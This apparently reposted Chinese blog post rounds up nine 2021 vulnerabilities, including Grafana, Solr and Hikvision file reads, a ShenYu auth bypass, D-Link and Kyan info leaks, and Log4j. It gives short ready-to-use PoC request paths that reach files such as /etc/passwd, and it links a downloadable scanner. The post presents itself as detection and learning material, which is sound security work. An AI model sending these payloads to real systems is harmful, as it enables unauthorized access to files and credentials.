2021年部分漏洞整合+检测工具

2021年已进入到尾声,出现的漏洞五花八门,令人眼花缭乱,其中确实有很多值得思考和学习,所以今天总结出9个比较有代表性、危害范围比较广泛的漏洞进行介绍,以及使用脚本进行检测

grafana任意文件读取漏洞

漏洞原理啥的就不再赘述,直接上测试过程以及脚本的检测方式,目前脚本检测仅支持单独检测

poc:

/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

页面原型:
在这里插入图片描述
漏洞利用:
在这里插入图片描述
脚本检测方式:

  1. 运行low.exe脚本,页面如下:
    在这里插入图片描述
  2. 选择代号1, 数字1-9分别对应想要检测的漏洞,此处选择1
    在这里插入图片描述
  3. 输入想要测试的url,请注意需要提供完整的url地址或者是https://ip:port
    https://127.0.0.1:8888 不要在端口号后加反斜杠
    在这里插入图片描述

Apache Druid任意文件读取漏洞检测

参考链接:

https://blog.csdn.net/weixin_48421613/article/details/121669590.

​使用脚本检测:

在这里插入图片描述

Apache ShenYu身份验证绕过漏洞检测

poc:

/dashboardUser​

页面原型:

在这里插入图片描述
漏洞检测:
在这里插入图片描述
工具检测:

在这里插入图片描述

Apache Log4j远程代码执行漏洞

参考链接:
https://mp.weixin.qq.com/s/yPEMotN8HWRptM0-Cm8t7w

脚本检测:
在这里插入图片描述

dnslog平台又不太好使了,这个脚本仅能测试记录header头信息的站点,详情请关注上一篇文章

在这里插入图片描述

D-Link DCS 信息泄露漏洞检测

poc:

/config/getuser?index=0

页面原型:
在这里插入图片描述
漏洞检测:
在这里插入图片描述
脚本检测:

在这里插入图片描述

Apache Solr 存在任意文件读取检测

页面原型:
在这里插入图片描述

poc:

/solr/admin/cores?indexInfo=false&wt=json
以get方式访问此链接,获取name值
/solr/name值/debug/dump?param=ContentStreams
以post方式访问此链接,body如下
stream.url=file:///etc/hosts

访问 地址获取name值

/solr/admin/cores?indexInfo=false&wt=json

在这里插入图片描述
而后以post方式访问漏洞地址,由于部分用户无权限访问etc/passwd,所以为了测试的准确性,仅访问 etc/hosts文件

在这里插入图片描述
使用脚本进行检测:
在这里插入图片描述

MessageSolution 邮件归档系统认证绕过漏洞

poc:

/authenticationserverservlet/

页面原型:
在这里插入图片描述
漏洞检测:
在这里插入图片描述
脚本检测:
在这里插入图片描述

海康威视任意文件读取漏洞

poc:

/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

页面原型:
在这里插入图片描述

漏洞检测:
在这里插入图片描述
工具检测:
在这里插入图片描述

Kyan 网络监控设备 信息泄露漏洞

poc:

/hosts

页面原型:
在这里插入图片描述
漏洞检测:
在这里插入图片描述
脚本检测:

在这里插入图片描述
脚本获取方式,

https://github.com/Ilovewomen/db_script_v1-/releases/tag/v1.0

或公众号回复

请关注公众号
在这里插入图片描述

db_script_v1​

猜你喜欢

转载自blog.csdn.net/weixin_48421613/article/details/121955425